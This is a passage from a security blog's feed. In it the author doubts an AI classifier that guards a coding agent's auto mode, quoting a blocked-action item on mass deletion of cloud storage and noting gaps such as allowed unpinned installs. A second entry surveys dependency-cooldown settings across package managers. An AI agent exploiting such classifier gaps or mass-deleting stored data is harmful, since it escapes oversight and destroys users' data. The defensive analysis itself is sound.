&lt;li&gt;Cloud Storage Mass Delete: Deleting or mass modifying files on cloud storage (S3, GCS, Azure Blob, etc.) [...]&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;I remain unconvinced by prompt injection protections that rely on AI, since they're non-deterministic by nature. The documentation does warn that this may still let things through:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The classifier may still allow some risky actions: for example, if user intent is ambiguous, or if Claude doesn't have enough context about your environment to know an action might create additional risk.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The fact that the default allow list includes &lt;code&gt;pip install -r requirements.txt&lt;/code&gt; also means that this wouldn't protect against supply chain attacks with unpinned dependencies, as seen this morning &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;with LiteLLM&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I still want my coding agents to run in a robust sandbox by default, one that restricts file access and network connections in a deterministic way. I trust those a whole lot more than prompt-based protections like this new auto mode.&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/prompt-injection"&gt;prompt-injection&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-code"&gt;claude-code&lt;/a&gt;&lt;/p&gt;

</summary><category term="security"/><category term="ai"/><category term="prompt-injection"/><category term="generative-ai"/><category term="llms"/><category term="coding-agents"/><category term="claude-code"/></entry><entry><title>Package Managers Need to Cool Down</title><link href="https://simonwillison.net/2026/Mar/24/package-managers-need-to-cool-down/#atom-blogmarks" rel="alternate"/><published>2026-03-24T21:11:38+00:00</published><updated>2026-03-24T21:11:38+00:00</updated><id>https://simonwillison.net/2026/Mar/24/package-managers-need-to-cool-down/#atom-blogmarks</id><summary type="html">
&lt;p&gt;&lt;strong&gt;&lt;a href="https://nesbitt.io/2026/03/04/package-managers-need-to-cool-down.html"&gt;Package Managers Need to Cool Down&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Today's &lt;a href="https://simonwillison.net/2026/Mar/24/malicious-litellm/"&gt;LiteLLM supply chain attack&lt;/a&gt; inspired me to revisit the idea of &lt;a href="https://simonwillison.net/2025/Nov/21/dependency-cooldowns/"&gt;dependency cooldowns&lt;/a&gt;, the practice of only installing updated dependencies once they've been out in the wild for a few days to give the community a chance to spot if they've been subverted in some way.&lt;/p&gt;
&lt;p&gt;This recent (March 4th) piece by Andrew Nesbitt reviews the current state of dependency cooldown mechanisms across different packaging tools. It's surprisingly well supported! There's been a flurry of activity across the major tools, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://pnpm.io/blog/releases/10.16#new-setting-for-delayed-dependency-updates"&gt;pnpm 10.16&lt;/a&gt; (September 2025) — &lt;code&gt;minimumReleaseAge&lt;/code&gt; with &lt;code&gt;minimumReleaseAgeExclude&lt;/code&gt; for trusted packages&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/yarnpkg/berry/releases/tag/%40yarnpkg%2Fcli%2F4.10.0"&gt;Yarn 4.10.0&lt;/a&gt; (September 2025) — &lt;code&gt;npmMinimalAgeGate&lt;/code&gt; (in minutes) with &lt;code&gt;npmPreapprovedPackages&lt;/code&gt; for exemptions&lt;/li&gt;
&lt;li&gt;&lt;a href="https://bun.com/blog/bun-v1.3#minimum-release-age"&gt;Bun 1.3&lt;/a&gt; (October 2025) — &lt;code&gt;minimumReleaseAge&lt;/code&gt; via &lt;code&gt;bunfig.toml&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://deno.com/blog/v2.6#controlling-dependency-stability"&gt;Deno 2.6&lt;/a&gt; (December 2025) — &lt;code&gt;--minimum-dependency-age&lt;/code&gt; for &lt;code&gt;deno update&lt;/code&gt; and &lt;code&gt;deno outdated&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/astral-sh/uv/releases/tag/0.9.17"&gt;uv 0.9.17&lt;/a&gt; (December 2025) — added relative duration support to existing &lt;code&gt;--exclude-newer&lt;/code&gt;, plus per-package overrides via &lt;code&gt;exclude-newer-package&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://ichard26.github.io/blog/2026/01/whats-new-in-pip-26.0/"&gt;pip 26.0&lt;/a&gt; (January 2026) — &lt;code&gt;--uploaded-prior-to&lt;/code&gt; (absolute timestamps only; &lt;a href="https://github.com/pypa/pip/issues/13674"&gt;relative duration support requested&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://socket.dev/blog/npm-introduces-minimumreleaseage-and-bulk-oidc-configuration"&gt;npm 11.10.0&lt;/a&gt; (February 2026) — &lt;code&gt;min-release-age&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;code&gt;pip&lt;/code&gt; currently only supports absolute rather than relative dates but Seth Larson &lt;a href="https://sethmlarson.dev/pip-relative-dependency-cooling-with-crontab"&gt;has a workaround for that&lt;/a&gt; using a scheduled cron job to update the absolute date in the &lt;code&gt;pip.conf&lt;/code&gt; config file.&lt;/p&gt;
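&lt;p&gt;For pnpm the whole thing is a couple of lines of config (example values of mine - &lt;code&gt;minimumReleaseAge&lt;/code&gt; is measured in minutes, and the excluded package name here is hypothetical):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# pnpm-workspace.yaml - wait 4 days before picking up any new release
minimumReleaseAge: 5760
minimumReleaseAgeExclude:
  - my-internal-package
&lt;/code&gt;&lt;/pre&gt;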


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/javascript"&gt;javascript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/packaging"&gt;packaging&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pip"&gt;pip&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/npm"&gt;npm&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/deno"&gt;deno&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/supply-chain"&gt;supply-chain&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/uv"&gt;uv&lt;/a&gt;&lt;/p&gt;

</summary><category term="javascript"/><category term="packaging"/><category term="pip"/><category term="pypi"/><category term="python"/><category term="security"/><category term="npm"/><category term="deno"/><category term="supply-chain"/><category term="uv"/></entry></feed>